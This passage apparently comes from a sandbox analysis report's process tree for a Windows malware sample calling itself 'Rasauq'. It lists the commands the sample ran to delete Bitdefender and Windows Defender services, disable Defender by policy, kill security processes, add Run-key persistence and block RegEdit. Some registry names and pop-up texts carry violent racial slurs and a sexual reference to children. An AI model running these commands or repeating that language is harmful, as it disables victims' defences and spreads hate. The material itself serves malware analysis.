  - - C:\Windows\system32\sc.exe
      sc delete bdsubwiz
      4⤵
      Launches sc.exe
      PID:5616
  - - C:\Windows\system32\sc.exe
      sc stop seccenter
      4⤵
      Launches sc.exe
      PID:3768
  - - C:\Windows\system32\sc.exe
      sc delete seccenter
      4⤵
      Launches sc.exe
      PID:5984
  - - C:\Windows\system32\sc.exe
      sc stop vsserv
      4⤵
      Launches sc.exe
      PID:3660
  - - C:\Windows\system32\sc.exe
      sc delete vsserv
      4⤵
      PID:1520
  - - C:\Windows\system32\sc.exe
      sc stop epssecurityservice
      4⤵
      Launches sc.exe
      PID:2252
  - - C:\Windows\system32\sc.exe
      sc delete epssecurityservice
      4⤵
      Launches sc.exe
      PID:2352
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f
      4⤵
      PID:1584
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f
      4⤵
      PID:5752
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f
      4⤵
      PID:4748
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f
      4⤵
      PID:3464
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f
      4⤵
      PID:3404
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f
      4⤵
      PID:3352
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f
      4⤵
      PID:3580
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f
      4⤵
      PID:3696
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f
      4⤵
      PID:3680
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f
      4⤵
      PID:4164
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f
      4⤵
      PID:3384
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:3612
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:4592
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:4344
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
      4⤵
      PID:420
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
      4⤵
      PID:2796
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:2008
  - - C:\Windows\system32\sc.exe
      sc delete WinDefend
      4⤵
      Launches sc.exe
      PID:4172
  - - C:\Windows\system32\sc.exe
      sc stop SecurityHealthService
      4⤵
      Launches sc.exe
      PID:5192
  - - C:\Windows\system32\sc.exe
      sc delete SecurityHealthService
      4⤵
      Launches sc.exe
      PID:396
  - - C:\Windows\system32\sc.exe
      sc stop Sense
      4⤵
      Launches sc.exe
      PID:244
  - - C:\Windows\system32\sc.exe
      sc delete Sense
      4⤵
      Launches sc.exe
      PID:4392
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MsMpEng.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5932
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MpCmdRun.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4576
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM SecurityHealthSystray.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2560
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM smartscreen.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2004
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4496
  - - C:\Windows\system32\icacls.exe
      icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2856
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Program Files\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:3804
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5144
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
      4⤵
      PID:4280
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f
      4⤵
      PID:2348
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
      4⤵
      PID:3424
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f
      4⤵
      PID:3592
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\notepad.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2924
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4228
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\calc.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1248
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3584
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4612
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3128
  - - C:\Windows\system32\powercfg.exe
      powercfg /hibernate off REM Disables hibernation
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2400
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:5000
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2776
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in
      4⤵
      Power Settings
      PID:5064
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "Device Name"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      PID:1504
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "USB Root Hub"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      PID:1728
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f
      4⤵
      Adds Run key to start application
      PID:1592
  - - C:\Windows\system32\reg.exe
      reg add "HKCR\behead all niggers" /f
      4⤵
      Modifies registry class
      PID:700
  - - C:\Windows\system32\reg.exe
      reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f
      4⤵
      PID:4780
  - - C:\Windows\system32\reg.exe
      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"
      4⤵
      PID:5072
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f
      4⤵
      Adds Run key to start application
      PID:772
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k
      4⤵
      PID:2984
    - - C:\Windows\system32\reg.exe
        
        reg query "HKU" /s /f "Software" /k
        5⤵
        
        PID:2120
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2936
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3792
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:1288
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2552
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:4352
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:5940
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1032
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1824
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:5376
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1108
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Software\Rasauq on top" /f
      4⤵
      PID:6016
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f
      4⤵
      PID:5492
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:4644
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:5248
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:5208
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:3936
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:2112
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5760
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      PID:2328
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:2752
  - - C:\Windows\system32\reg.exe
      reg add "End of search: 20 match(es) found.\Software\Rasauq on top" /f
      4⤵
      PID:4056
  - - C:\Windows\system32\msg.exe
      msg * /time:3 "This machine has been compromised by Rasuaq"
      4⤵
      PID:3896
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1600
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
      4⤵
      Disables RegEdit via registry modification
      PID:3344
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4852
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4812
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:404
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3920
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5096
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      Drops file in Windows directory
      Enumerates system info in registry
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:1232
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x308,0x7fffd100f208,0x7fffd100f214,0x7fffd100f220
        5⤵
        
        PID:4104
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1844,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:11
        5⤵
        
        PID:5128
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2236,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:2
        5⤵
        
        PID:4532
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2372,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:13
        5⤵
        
        PID:3672
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3368,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=3432 /prefetch:1
        5⤵
        
        PID:4484
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3376,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=3440 /prefetch:1
        5⤵
        
        PID:2844
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4120,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=4836 /prefetch:1
        5⤵
        
        PID:2120
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4996,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=4980 /prefetch:1
        5⤵
        
        PID:3648
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5184,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=5200 /prefetch:1
        5⤵
        
        PID:3008
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=5332,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:1
        5⤵
        
        PID:4108
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5552,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=5540 /prefetch:1
        5⤵
        
        PID:3432
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=3444,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:1
        5⤵
        
        PID:3776
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5768,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=5572 /prefetch:1
        5⤵
        
        PID:2092
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6080,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=5956 /prefetch:1
        5⤵
        
        PID:5096
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=6256,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=6260 /prefetch:1
        5⤵
        
        PID:5748
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=6376,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=6420 /prefetch:1
        5⤵
        
        PID:3636
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6592,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=4708 /prefetch:1
        5⤵
        
        PID:2404
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6752,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=6760 /prefetch:1
        5⤵
        
        PID:3708
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6400,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=6928 /prefetch:1
        5⤵
        
        PID:2688
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=7104,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=7096 /prefetch:1
        5⤵
        
        PID:1680
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=7248,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=7272 /prefetch:1
        5⤵
        
        PID:3284
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=7448,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=7460 /prefetch:1
        5⤵
        
        PID:1948
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=7436,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=7612 /prefetch:1
        5⤵
        
        PID:3632
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=7752,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=7812 /prefetch:1
        5⤵
        
        PID:4676
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=8116,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=8132 /prefetch:1
        5⤵
        
        PID:2044
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7156,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=8320 /prefetch:1
        5⤵
        
        PID:4788
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
